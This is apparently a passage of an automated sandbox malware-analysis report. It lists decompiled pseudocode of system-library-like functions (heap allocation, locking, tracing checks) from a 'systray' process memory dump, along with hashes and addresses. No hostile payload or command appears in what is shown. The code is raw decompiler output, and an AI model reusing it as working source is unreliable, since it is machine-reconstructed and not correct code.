							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L045B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x045d3d4c
0x045d3d50
0x045d3d55
0x045d3d5e
0x0460e79a
0x00000000
0x0460e79a
0x045d3d68
0x0460e789
0x045d3d9d
0x045d3da3
0x045d3daf
0x045d3db5
0x045d3dbc
0x045d3dc4
0x045d3dc9
0x045d3dce
0x0460e7ae
0x0460e7ae
0x045d3dde
0x045d3de2
0x045d3de7
0x045d3e0d
0x045d3e13
0x045d3e16
0x045d3e1e
0x045d3e25
0x045d3e28
0x00000000
0x00000000
0x045d3e2a
0x045d3e2f
0x045d3e37
0x045d3e37
0x00000000
0x045d3e37
0x045d3e31
0x00000000
0x045d3e31
0x045d3e20
0x045d3e20
0x045d3e35
0x00000000
0x045d3de9
0x045d3de9
0x045d3de9
0x045d3dee
0x045d3dfd
0x045d3dff
0x045d3e02
0x045d3e05
0x045d3e05
0x00000000
0x045d3df0
0x045d3de7
0x0460e78f
0x0460e794
0x045d3d79
0x045d3d84
0x045d3d89
0x045d3d8e
0x00000000
0x0460e7a4
0x045d3d96
0x045d3d9a
0x00000000
0x045d3d9a
0x00000000
0x0460e794
0x045d3d6e
0x045d3d73
0x00000000
0x0460e7b5
0x00000000

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12877ed1d95b92d332be0ae28327b10b2796d8b37bd5df76030780e98cd6287d
Instruction ID: 2bd0f07a7ff7eab5d1c2a1ba167e3bc5f49b97b0af0ac162da1fb8cd2f6aaa9c
Opcode Fuzzy Hash: 12877ed1d95b92d332be0ae28327b10b2796d8b37bd5df76030780e98cd6287d
Instruction Fuzzy Hash: CE31B271701625EBC7389F2DD841A6BBBE5FF95740B05846AE846CB390F730E840EB92

Uniqueness

Uniqueness Score: -1.00%

Function 04617016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04617016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x468d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04616B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04616B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E045B7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E045D9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E045DB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L045B4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x04617016
0x0461701e
0x0461702b
0x04617033
0x04617037
0x0461703c
0x0461703e
0x04617041
0x04617045
0x0461704a
0x04617050
0x04617055
0x0461705a
0x04617062
0x04617062
0x0461705a
0x04617064
0x04617064
0x04617067
0x04617071
0x04617096
0x0461709b
0x046170a2
0x046170a6
0x046170a7
0x046170ad
0x046170b3
0x046170b6
0x046170bb
0x046170c3
0x046170c3
0x046170c6
0x046170cd
0x046170dd
0x046170e0
0x046170e2
0x046170e2
0x046170ee
0x04617101
0x046170f0
0x046170f9
0x046170f9
0x0461710a
0x0461710e
0x04617112
0x04617117
0x04617118
0x04617118
0x046170bb
0x0461711d
0x04617123
0x04617131
0x04617131
0x04617136
0x0461713d
0x0461713e
0x0461713f
0x0461714a
0x0461714a
0x04617084
0x04617088
0x00000000
0x0461708e
0x0461708e
0x04617092
0x00000000
0x04617092

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5926e933670786d003859675507c042b0c83ec07aefe89d0fd878373b4cc9576
Instruction ID: 63f04325701e0606938e7787dbb4ea2b046f5a429ead540985cfd736acb10b78
Opcode Fuzzy Hash: 5926e933670786d003859675507c042b0c83ec07aefe89d0fd878373b4cc9576
Instruction Fuzzy Hash: 313193726047919BC320DF68C941A6AB7E5BFD8701F094A2DF895877A0E730F914C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 045BC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E045BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E045B7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04668D34(_v8, _t80);
					}
					E045B2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E045AFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04668833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E045AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E045DB180();
						if(_a4 != 0) {
							E045B2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E045BBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E045BBB2D(_t16, _t15);
						E045BB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E045AFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E045AFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E045AFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x045bc18d
0x045bc18f
0x045bc191
0x045bc19b
0x045bc1a0
0x045bc1d4
0x045bc1de
0x04602d6e
0x045bc1e4
0x045bc1e4
0x045bc1e4
0x045bc1ec
0x04602d7d
0x04602d7d
0x045bc1f3
0x045bc1ff
0x04602d88
0x04602d8d
0x04602d94
0x04602d94
0x04602d9f
0x04602da4
0x04602dab
0x04602db0
0x04602db2
0x04602db3
0x04602db4
0x04602dbc
0x04602dc3
0x04602dc3
0x045bc205
0x045bc205
0x045bc208
0x045bc20e
0x045bc211
0x045bc216
0x045bc219
0x045bc21f
0x045bc222
0x045bc22c
0x045bc234
0x045bc23a
0x045bc23f
0x045bc245
0x045bc24b
0x045bc251
0x045bc25a
0x045bc276
0x045bc27d
0x045bc27d
0x045bc25c
0x045bc25c
0x00000000
0x045bc25e
0x045bc1a4
0x045bc1aa
0x045bc1b3
0x045bc265
0x045bc26c
0x045bc26c
0x00000000

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: a1561830757934432dcec267ae65d0e297457b44d713f54025fc396bf987e339
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 18310372B01547AEE705EBB4C490BEEF754BF82208F04815ED49897341EB347A19E7E5

Uniqueness

Uniqueness Score: -1.00%

Function 045CE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E045CE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E045D9670() < 0) {
					L045EDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4687b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L045B4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M045CE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x045ce730
0x045ce736
0x045ce738
0x045ce73d
0x045ce73e
0x045ce740
0x045ce749
0x045ce765
0x045ce76a
0x045ce76b
0x045ce76c
0x045ce76d
0x045ce76e
0x045ce76f
0x045ce775
0x045ce777
0x045ce77e
0x0460b675
0x045ce784
0x045ce784
0x045ce789
0x045ce7a8
0x045ce7ac
0x045ce807
0x045ce7ae
0x045ce7ae
0x045ce7b1
0x045ce7b4
0x045ce7b9
0x045ce7c0
0x045ce7c4
0x045ce7ca
0x045ce7cc
0x00000000
0x045ce7d3
0x045ce7d6
0x00000000
0x00000000
0x045ce7ff
0x045ce802
0x00000000
0x00000000
0x045ce7f9
0x045ce7fc
0x00000000
0x00000000
0x045ce7f3
0x045ce7f6
0x00000000
0x00000000
0x045ce7ed
0x045ce7f0
0x00000000
0x00000000
0x045ce7e7
0x045ce7ea
0x00000000
0x00000000
0x0460b685
0x0460b688
0x00000000
0x00000000
0x0460b682
0x00000000
0x00000000
0x045ce7cc
0x045ce7d9
0x045ce7dc
0x045ce7de
0x045ce7de
0x045ce7ac
0x045ce7e4
0x045ce74b
0x045ce751
0x045ce759
0x045ce761
0x045ce761

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b310028c7db88b03daffa889c741ad393f0e3d1df5bc55419ec98493a7601b3a
Instruction ID: 4c3e24a7619d009af10220758076c0fefe36e3ae148c1aa62ca7951124ba27c1
Opcode Fuzzy Hash: b310028c7db88b03daffa889c741ad393f0e3d1df5bc55419ec98493a7601b3a
Instruction Fuzzy Hash: CE318D75A54249EFD704CF58D841B9ABBE8FB19314F14865AF904CB341E635ED80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 045CBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E045CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4686100; // 0x6
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E045B2280(0xd, 0x1609f1a0);
				_t41 =  *0x46860f8; // 0x0
				if(_t41 != 0) {
					 *0x46860f8 =  *_t41;
					 *0x46860fc =  *0x46860fc + 0xffff;
				}
				E045AFFB0(_t41, 0x800, 0x1609f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x46860f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L045B4620(0x4686100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4686100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x045cbc36
0x045cbc42
0x045cbc45
0x045cbc4a
0x045cbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x045cbc50
0x045cbc50
0x045cbc58
0x045cbc5a
0x045cbc60
0x00000000
0x00000000
0x0460a4f2
0x0460a4f6
0x00000000
0x00000000
0x00000000
0x0460a4fc
0x045cbc79
0x045cbc7e
0x045cbc86
0x045cbd16
0x045cbd20
0x045cbd20
0x045cbc8d
0x045cbc94
0x045cbcbd
0x045cbcca
0x045cbccb
0x045cbccc
0x045cbccd
0x045cbcce
0x045cbcd4
0x045cbcea
0x045cbcee
0x045cbcf2
0x045cbd00
0x045cbd04
0x00000000
0x045cbc96
0x045cbcab
0x045cbcaf
0x045cbd2c
0x045cbd2c
0x045cbd09
0x00000000
0x045cbd09
0x045cbcb1
0x045cbcb5
0x045cbcbb
0x00000000
0x00000000
0x00000000
0x045cbcbb

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2a185f739fec8b1b1887173208f73878132a9252027c8a048a12f8b1cafcb3
Instruction ID: 9f7df71194c0f244d5f267f924a8bf6916a2beb6f6d199ceef4425e1f0727cc9
Opcode Fuzzy Hash: 7f2a185f739fec8b1b1887173208f73878132a9252027c8a048a12f8b1cafcb3
Instruction Fuzzy Hash: 4E31FD32A00616AFDB11EF98E4817A673B4FB18310F00467DE845DB242FAB8FD05EB84

Uniqueness

Uniqueness Score: -1.00%

Function 04599100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04599100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x466f6e8);
				E045ED0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E046688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E045ED130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x46886c0; // 0x4407b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x46886b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E045B2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E046688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E045DAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x468b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x46884c0;
										if(_t69 >=  *0x46884c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04669063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0459922A(_t82);
							_t53 = E045B7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04668B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x46886c0; // 0x4407b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x46886b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x46886bc;
										_t72 = 0x46886b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04599240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x46886c4;
									_t72 = 0x46886c0;
									L18:
									E045C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x04599100
0x04599100
0x04599100
0x04599100
0x04599102
0x04599107
0x0459910c
0x04599110
0x04599115
0x04599136
0x04599143
0x045f37e4
0x045f37e4
0x04599149
0x0459914e
0x0459914e
0x04599117
0x0459911d
0x00000000
0x00000000
0x0459911f
0x04599125
0x00000000
0x04599151
0x04599158
0x0459915d
0x04599161
0x04599168
0x045f3715
0x00000000
0x0459916e
0x0459916e
0x04599175
0x04599177
0x0459917e
0x0459917f
0x04599182
0x04599182
0x04599187
0x04599187
0x0459918a
0x0459918d
0x0459918f
0x04599192
0x04599195
0x04599198
0x04599198
0x04599198
0x0459919a
0x00000000
0x00000000
0x045f371f
0x045f3721
0x045f3727
0x045f372f
0x045f3733
0x045f3735
0x045f3738
0x045f373b
0x045f373d
0x045f3740
0x00000000
0x00000000
0x045f3746
0x045f3749
0x00000000
0x00000000
0x045f374f
0x045f3751
0x00000000
0x00000000
0x045f3757
0x045f3759
0x045f375c
0x045f375c
0x045f375e
0x045f375e
0x045f3761
0x045f3764
0x00000000
0x00000000
0x045f3766
0x045f3768
0x045f37a3
0x045f37a3
0x045f37a5
0x045f37a7
0x045f37ad
0x045f37b0
0x045f37b2
0x045f37bc
0x045f37c2
0x045f37c2
0x045f37b2
0x04599187
0x04599187
0x0459918a
0x0459918d
0x0459918f
0x04599192
0x04599195
0x00000000
0x04599195
0x00000000
0x04599187
0x045f376a
0x045f376a
0x045f376c
0x045f376c
0x045f376f
0x045f3775
0x00000000
0x00000000
0x045f3777
0x045f3779
0x00000000
0x00000000
0x045f3782
0x045f3787
0x045f3789
0x045f3790
0x045f3790
0x045f378b
0x045f378b
0x045f378b
0x045f3792
0x045f3795
0x045f3795
0x045f3798
0x045f3798
0x045f379b
0x045f379b
0x045991a3
0x045991a9
0x045991b0
0x045991b4
0x045991b4
0x045991bb
0x045991c0
0x045991c5
0x045991c7
0x045f37da
0x045991cd
0x045991cd
0x045991cd
0x045991d2
0x045991d5
0x04599239
0x04599239
0x045991d7
0x045991db
0x045991e1
0x045991e7
0x045991fd
0x04599203
0x0459921e
0x04599223
0x00000000
0x04599223
0x04599205
0x04599208
0x0459920c
0x04599214
0x04599214
0x045991e9
0x045991e9
0x045991ee
0x045991f3
0x045991f3
0x045991f3
0x045991e7
0x00000000
0x045991db
0x04599187
0x04599168

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aa618fdf6ee0eb2d6f2f590e71f43280b629b9d768787be6da59444d1758ad7
Instruction ID: 554f657afb449830260f4446e62411e40cc209e37c3718b3fed0f0ca2b46c7b8
Opcode Fuzzy Hash: 6aa618fdf6ee0eb2d6f2f590e71f43280b629b9d768787be6da59444d1758ad7
Instruction Fuzzy Hash: 27317CB1A016859FEF29EF68D4887ACB7F1BB88354F18854DD40567341D334BD80AB52

Uniqueness

Uniqueness Score: -1.00%

Function 045D90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E045D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E045ED4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E045CE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
